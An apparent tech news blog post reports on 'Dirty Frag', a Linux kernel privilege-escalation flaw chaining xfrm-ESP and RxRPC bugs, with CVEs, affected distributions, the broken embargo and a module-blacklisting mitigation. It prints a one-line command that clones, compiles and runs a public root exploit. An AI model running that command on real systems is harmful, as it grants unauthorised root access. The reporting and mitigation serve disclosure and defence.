Security researcher Hyunwoo Kim just dropped a bomb on the Linux community. Meet Dirty Frag, the latest “Dirty” vulnerability that gives attackers root access on basically every major Linux distribution you’re running right now.
And it’s completely unpatched. Even in kernel 7.0.4 that dropped today.
The Damage
This isn’t some theoretical exploit that needs perfect timing and a PhD to pull off. Dirty Frag chains two separate page-cache vulnerabilities (xfrm-ESP and RxRPC) into a single, deterministic attack. Translation: it works almost every time, doesn’t crash your kernel when it fails, and requires zero race conditions.
The xfrm-ESP bug has been sitting in the kernel since January 2017. That’s nine years of exposure. The RxRPC component is newer (June 2023), but it’s the combo that makes this dangerous.
One Command, Root Access
The exploit is literally a one-liner:
git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
Kim tested this on Ubuntu 24.04.4, RHEL 10.1, openSUSE Tumbleweed, CentOS Stream 10, AlmaLinux 10, Fedora 44, and more. It worked on all of them. RHEL 8 is confirmed vulnerable. Debian users report mixed results.
Why Two Bugs?
The xfrm-ESP vulnerability gives you a powerful 4-byte write primitive but needs namespace creation privileges. Ubuntu sometimes blocks that through AppArmor. The RxRPC bug doesn’t need those privileges but the module isn’t loaded everywhere.
Except Ubuntu loads rxrpc by default.
By chaining both, Kim covered all the blind spots. Every major distro falls to at least one of these exploits.
The Embargo Disaster
Here’s where it gets messy. An unrelated third party broke the embargo before patches were ready. The community is livid. One researcher called it “inconsiderate and selfish” for announcing the vulnerability before the kernel team’s embargo date.
CVE-2026-43284 (xfrm-ESP) got assigned and patched in mainline kernel yesterday. CVE-2026-43500 (RxRPC) has been reserved but there’s no patch in any tree yet.
That means millions of Linux systems are exposed right now with public exploit code available. This is the second major local privilege escalation leaked without patches in two weeks.
The Copy Fail Connection
Remember Copy Fail? Same bug class. Dirty Frag even shares the same sink as Copy Fail for the xfrm-ESP component. But here’s the kicker: if you applied the Copy Fail mitigation (blacklisting algif_aead), you’re still vulnerable. Dirty Frag doesn’t need that module.
Oh, and there’s a copyfail2 out now too. Similar trick, different subsystem. Fun times.
Temporary Fix (With Consequences)
Until your distro backports the patches, Kim recommends this mitigation:
bashsh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"
But here’s the catch: this breaks IPsec and RxRPC. If you’re using IPsec VPNs or the AFS distributed file system, you’re choosing between security and functionality. Pick your poison.
One Reddit user noted that kernel lockdown might prevent or limit exploitation, but that’s not confirmed yet.
Why “Dirty Frag”?
Kim explains the name derives from Dirty Pipe (its ancestor) and the fact that it “dirties” the frag member of struct sk_buff. Yes, we have another branded “Dirty” vulnerability. Get used to it.
What Now?
Check if your distro has released patches. Update immediately when available. If you’re running production systems and can afford to break IPsec, apply the mitigation now and reboot or clear your page cache.
The full technical writeup is at dirtyfrag.io. It’s worth reading if you want to understand how badly the page-cache write primitives can be abused.
Nine years is a long time to leave the door open. And finding out through an embargo break on a Friday? That’s just cruel.
